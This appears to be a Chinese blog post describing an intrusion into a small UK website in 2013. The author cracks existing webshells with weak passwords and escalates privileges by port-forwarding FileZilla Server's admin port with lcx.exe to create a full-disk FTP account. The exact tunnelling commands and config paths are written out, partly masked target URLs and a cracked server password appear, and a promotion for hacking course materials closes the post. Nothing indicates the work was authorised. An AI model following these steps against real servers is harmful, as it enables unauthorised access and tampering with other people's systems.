记一次完整的后门爆破到提权实战案例

0x01 前言

**Date/time:**2013年,这次的目标是一个英国小网站,目的是拿下这个站点指定文件的修改权限。习惯性的在渗透某个目标之前先对目标进行基本的信息搜集,这样在后面的渗透过程中可以省下不少时间,此次的渗透可以说80%的运气,20%的经验才顺利拿到目标权限。

基本信息探测:

  • 目标站点:http://www.wem****.co.uk
  • 服务器IP:9*.19.14.*2(英国)
  • 环境平台:ASP.NET
  • 服务器系统:Microsoft-IIS/7.5
PORT         STATE          SERVICE         VERSION21/tcp       open           ftp             FileZilla ftpd 0.9.41 beta80/tcp       open           http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

0x02 Getshell过程

这里就简化写了,先在主站仔细找找上传、注入、Fckeditor和敏感文件、目录,结果都没找到,主站基本没戏了,接着拿御剑对目标站的旁站进行扫描,后来去忙其他事了,放着在扫,事情忙完后还看了部电影,准备关电脑睡觉的时候才发现御剑还在扫着的呢,都快给忘了。

打开御剑把扫描到的链接导出来,用了半小时检测,虽然发现了一些上传、注入,Fckeditor啥的,但感觉这些漏洞好像都被别人修复过了,接着往下看,找到了几个敏感文件名,打开看既然是一个大马和一句话木马,通过弱口令和爆破方式成功得到密码。

弱口令测试:http://www.berkshire-*****-workshops.co.uk/test.aspx    Pass:admin
一句话爆破:http://www.sonnergy*shade.co.uk/css.asp                 Pass:110

在这里插入图片描述

爆破字典:https://github.com/3had0w/Fuzzing-Dicts

在这里插入图片描述

**注:**成功拿到这个目标网站的Webshell权限可以说运气成份很大,但也需要一定的细心、耐心和经验,这几点在做渗透测试时也是非常重要的。

*0x03 实战提权过程*

由于这次目的是拿下这个目标站点指定文件的修改权限,所以我们得先去看看能不能直接跨到目标站点路径,如果不能直接跨过去或者是没有修改权限时再去想其它办法进行提权。

  1. 经过测试发现可直接跨到目标站,并且具备上传、新建和删除文件权限,但就是没有修改权限;
  2. 2008的提权EXP不多,尝试了各种已知提权EXP均以失败告终,可以再去试一下MSF的提权模块;
  3. 找第三方软件提权,前期的信息探测中已知系统运行着FileZilla ftpd 0.9.41 beta软件,找找看有没有安装的有FileZilla Server服务端;

**注:**可以用netstat -ano、tasklist命令来查看目标机器中是否安装的有可用于提权的第三方软件,如:Radmin、Gene6FTP、FileZilla Server等。

Filezilla Serve这个软件在国外服务器用的还是挺多的,21端口是客户端连接时需要的,14147端口则是服务端运行时需要的。我们的提权方法就是利用端口转发方式直接登录到目标机器的Filezilla Server服务端,然后创建一个拥有全盘目录权限的FTP账户。

(1) 使用netstat -ano、tasklist命令确认目标服务器是否运行了Filezilla Server软件,是不是用默认的14147端口,或者是修改为其它端口了,如下图。

在这里插入图片描述

(2) Filezilla Server服务端一般都会默认安装在C、D盘下的\Program Files\文件夹中,这里我已经提前找到了,安装目录下有2个重要的XML配置文件。

用来保存管理员用户信息:C:\Program Files\FileZilla Server\FileZillaServer Interface.xml
用来保存普通FTP用户信息:C:\Program Files\FileZilla Server\FileZilla Server.xml

(3) 本地执行:lcx.exe -listen 51 14147,首先本机监听51端口,连接用14147端口。

在这里插入图片描述

(4) Webshell上执行:lcx.exe -slave 外网IP 51 127.0.0.1 14147

在这里插入图片描述

(5) 本地运行打包下来的Filezilla Server,打开后会自动读取配置文件里的账户密码进行连接。

在这里插入图片描述

**注:**如果出现连接不上的情况,这可能是因为我们本地的Filezilla Server与目标的Filezilla Server版本不一致,为了避免这个问题,可以直接将服务器上的Filezilla Server整个文件夹打包下来运行。

(6) Filezilla Server上创建一个拥有C、D盘权限账户,将读取/写入/创建/删除权限都给勾选上。

在这里插入图片描述

(7) 这里给的D盘权限是因为目标网站都放在D盘,只要达到能修改指定文件目的就行,大家在实际测试过程中可以选择添加C盘权限,然后再进行下一步的提权操作

在这里插入图片描述

这里目的已经达到,指定文件已经有了修改权限,所以就暂时没再继续提服务器了,FTP权限已经足够用了!隔了几天后用MS12-042提权EXP成功拿到服务器权限,帐号:luoye,密码:456$love。

0x04 思考总结

(1) 服务器外网,配置文件有修改权限,直接修改FileZilla Server.xml配置文件,这种情况应该比较少见,就不再详细写了。

(2) 服务器外网,配置文件只读权限,通过端口转发工具将端口转发出来,如果服务器不在内网,随便一款端口转发都可以。

(3) 服务器内网,配置文件只读权限,利用lcx.exe将内网端口转发出来,与2的方法是一样的,只不过一个内网,一个外网。

  • 外网服务器:用端口转发功能突破配置文件只读限制;
  • 内网服务器:用端口转发功能突破内网连接及配置文件只读限制;

如果你是准备学习网络安全(黑客)或者正在学习,这里给你准备了腾讯大佬内部分享的资料,你应该能用得上:

①网络安全学习路线
②20份渗透测试电子书
③靶场学习文档和视频
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

一、网络安全(黑客)学习路线

网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

在这里插入图片描述

二、网络安全教程视频

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

三、网络安全CTF实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

img

四、网络安全面试题

最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。

在这里插入图片描述

网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。

机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!

这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

img

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值